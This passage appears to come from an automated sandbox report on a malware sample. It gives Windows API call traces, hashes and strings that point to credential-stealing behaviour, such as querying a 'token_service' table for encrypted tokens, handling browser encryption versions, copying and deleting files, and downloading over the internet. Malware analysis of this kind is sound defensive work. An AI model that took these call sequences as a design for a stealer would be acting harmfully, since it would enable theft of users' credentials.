                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                        • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                        • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                        • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: 0aA
                                      • API String ID: 167551676-2786531170
                                      • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                      • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                      • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                      • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009DAE38,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,009DAE38,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                      • __aulldiv.LIBCMT ref: 00418172
                                      • __aulldiv.LIBCMT ref: 00418180
                                      • wsprintfA.USER32 ref: 004181AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2886426298-3474575989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                      APIs
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A51
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A68
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A7F
                                        • Part of subcall function 00914A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914AA0
                                        • Part of subcall function 00914A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914AB0
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00916376
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 009163AE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009163F6
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0091641A
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00916443
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00916471
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 009164B0
                                      • InternetCloseHandle.WININET(?), ref: 009164BA
                                      • InternetCloseHandle.WININET(00000000), ref: 009164C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 4287319946-0
                                      • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction ID: fc8dc98ffba38468c64838a26b1151f7b06d08b244edede4be3118790136b8aa
                                      • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction Fuzzy Hash: DB516CB5A4021CAFDF20DFA0DC49BEE7779AB44701F508098B605A71C0DBB46A89CF95
                                      APIs
                                      • memset.MSVCRT ref: 00924FEE
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                      • lstrcat.KERNEL32(?,00000000), ref: 00925017
                                      • lstrcat.KERNEL32(?,00421000), ref: 00925034
                                        • Part of subcall function 00924B77: wsprintfA.USER32 ref: 00924B93
                                        • Part of subcall function 00924B77: FindFirstFileA.KERNEL32(?,?), ref: 00924BAA
                                      • memset.MSVCRT ref: 0092507A
                                      • lstrcat.KERNEL32(?,00000000), ref: 009250A3
                                      • lstrcat.KERNEL32(?,00421020), ref: 009250C0
                                        • Part of subcall function 00924B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00924BD8
                                        • Part of subcall function 00924B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00924BEE
                                        • Part of subcall function 00924B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00924DE4
                                        • Part of subcall function 00924B77: FindClose.KERNEL32(000000FF), ref: 00924DF9
                                      • memset.MSVCRT ref: 00925106
                                      • lstrcat.KERNEL32(?,00000000), ref: 0092512F
                                      • lstrcat.KERNEL32(?,00421038), ref: 0092514C
                                        • Part of subcall function 00924B77: wsprintfA.USER32 ref: 00924C17
                                        • Part of subcall function 00924B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00924C2C
                                        • Part of subcall function 00924B77: wsprintfA.USER32 ref: 00924C49
                                        • Part of subcall function 00924B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00924C85
                                        • Part of subcall function 00924B77: lstrcat.KERNEL32(?,0064A524), ref: 00924CB1
                                        • Part of subcall function 00924B77: lstrcat.KERNEL32(?,00420FF8), ref: 00924CC3
                                        • Part of subcall function 00924B77: lstrcat.KERNEL32(?,?), ref: 00924CD7
                                        • Part of subcall function 00924B77: lstrcat.KERNEL32(?,00420FFC), ref: 00924CE9
                                        • Part of subcall function 00924B77: lstrcat.KERNEL32(?,?), ref: 00924CFD
                                        • Part of subcall function 00924B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00924D13
                                        • Part of subcall function 00924B77: DeleteFileA.KERNEL32(?), ref: 00924D98
                                      • memset.MSVCRT ref: 00925192
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID:
                                      • API String ID: 4017274736-0
                                      • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction ID: 27c5b3ee8a2f768c90b7a03968500c1b814f16e608b042950aee52ce1a9e6118
                                      • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction Fuzzy Hash: 8741B67AA402287BDB14F7B0EC47FED7738AF64701F404454B685A60C5EEB897D88B92
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00928397
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0092839E
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009283BF
                                      • __aulldiv.LIBCMT ref: 009283D9
                                      • __aulldiv.LIBCMT ref: 009283E7
                                      • wsprintfA.USER32 ref: 00928413
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: @
                                      • API String ID: 2774356765-2766056989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: da0d072a0d6176f1bded62865ed263c80ec526fc4d14da84815530cbb7fec5ee
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: 5C214AB1E45218ABDB00DFD4DC49FAEB7B9FB44B14F204619F605BB284C77869008BA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 1440504306-1079375795
                                      • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                      • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                      • Opcode Fuzzy Hash: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                      • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: B
                                      • API String ID: 1494266314-2248957098
                                      • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                      • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                      APIs
                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                      • memset.MSVCRT ref: 00409EE8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 1977917189-1096346117
                                      • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                      • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                      • Opcode Fuzzy Hash: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                      • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                      APIs
                                        • Part of subcall function 00917537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009175A1
                                        • Part of subcall function 00917537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00917618
                                        • Part of subcall function 00917537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00917674
                                        • Part of subcall function 00917537: GetProcessHeap.KERNEL32(00000000,?), ref: 009176B9
                                        • Part of subcall function 00917537: HeapFree.KERNEL32(00000000), ref: 009176C0
                                      • lstrcat.KERNEL32(0064A668,004217FC), ref: 0091786D
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 009178AF
                                      • lstrcat.KERNEL32(0064A668,00421800), ref: 009178C1
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 009178F6
                                      • lstrcat.KERNEL32(0064A668,00421804), ref: 00917907
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 0091793A
                                      • lstrcat.KERNEL32(0064A668,00421808), ref: 00917954
                                      • task.LIBCPMTD ref: 00917962
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID:
                                      • API String ID: 2677904052-0
                                      • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction ID: d3059c5190839c6449856cee80298a38acb6dc5a28b160c43acc7433039b0d52
                                      • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction Fuzzy Hash: 09315E76B40109EFCB04FBE0DC95EFF777AEB85301B145118F112A7290DA35A986CB61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00915231
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00915238
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00915251
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00915278
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 009152A8
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 009152F1
                                      • InternetCloseHandle.WININET(?), ref: 00915320
                                      • InternetCloseHandle.WININET(?), ref: 0091532D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 1008454911-0
                                      • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction ID: ded61d09fcf6304526644cba4d7f8d942f740c6ba435a61eca16a9d92782c1c9
                                      • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction Fuzzy Hash: C73138B9A40218EBDB20CF94DC85BDCB7B5EB48704F1085D9F609A7280D7B46EC58F99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                      • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                      • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                      • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                      • InternetCloseHandle.WININET(?), ref: 004050C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 3894370878-0
                                      • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                      • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                      • Opcode Fuzzy Hash: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                      • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                      APIs
                                        • Part of subcall function 0092AA87: lstrlen.KERNEL32(0091516C,?,?,0091516C,00420DDE), ref: 0092AA92
                                        • Part of subcall function 0092AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0092AAEC
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 009258AB
                                      • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00925908
                                      • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00925ABE
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00925457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0092548F
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00925527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0092557F
                                        • Part of subcall function 00925527: lstrlen.KERNEL32(00000000), ref: 00925596
                                        • Part of subcall function 00925527: StrStrA.SHLWAPI(00000000,00000000), ref: 009255CB
                                        • Part of subcall function 00925527: lstrlen.KERNEL32(00000000), ref: 009255EA
                                        • Part of subcall function 00925527: strtok.MSVCRT(00000000,?), ref: 00925605
                                        • Part of subcall function 00925527: lstrlen.KERNEL32(00000000), ref: 00925615
                                      • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 009259F2
                                      • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00925BA7
                                      • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00925C73
                                      • Sleep.KERNEL32(0000EA60), ref: 00925C82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID:
                                      • API String ID: 3630751533-0
                                      • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction ID: 517ad5f02ba796347ffdd25db2fed3853787659d9a951d170ffd48a4d8fba977
                                      • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction Fuzzy Hash: 4DE15376900628EBCB18FBA0FD56FED7379AF95300F408168B50666199EF345B48CB92
                                      APIs
                                      • memset.MSVCRT ref: 0091158E
                                        • Part of subcall function 00911507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0091151B
                                        • Part of subcall function 00911507: RtlAllocateHeap.NTDLL(00000000), ref: 00911522
                                        • Part of subcall function 00911507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0091153E
                                        • Part of subcall function 00911507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0091155C
                                        • Part of subcall function 00911507: RegCloseKey.ADVAPI32(?), ref: 00911566
                                      • lstrcat.KERNEL32(?,00000000), ref: 009115B6
                                      • lstrlen.KERNEL32(?), ref: 009115C3
                                      • lstrcat.KERNEL32(?,004262EC), ref: 009115DE
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 009116CC
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00919C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00919C53
                                        • Part of subcall function 00919C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919C78
                                        • Part of subcall function 00919C27: LocalAlloc.KERNEL32(00000040,?), ref: 00919C98
                                        • Part of subcall function 00919C27: ReadFile.KERNEL32(000000FF,?,00000000,009116F6,00000000), ref: 00919CC1
                                        • Part of subcall function 00919C27: LocalFree.KERNEL32(009116F6), ref: 00919CF7
                                        • Part of subcall function 00919C27: CloseHandle.KERNEL32(000000FF), ref: 00919D01
                                      • DeleteFileA.KERNEL32(00000000), ref: 00911756
                                      • memset.MSVCRT ref: 0091177D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID:
                                      • API String ID: 3885987321-0
                                      • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                      • Instruction ID: a585e0ae2f40ae2fe7440ab0723f3c9c61d0499d0beb61e308d5fc53919f5f03
                                      • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                      • Instruction Fuzzy Hash: B45166B29402299BCB15FB60ED92FED737DAF94700F4041E8B64962086EE305B89CF56
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
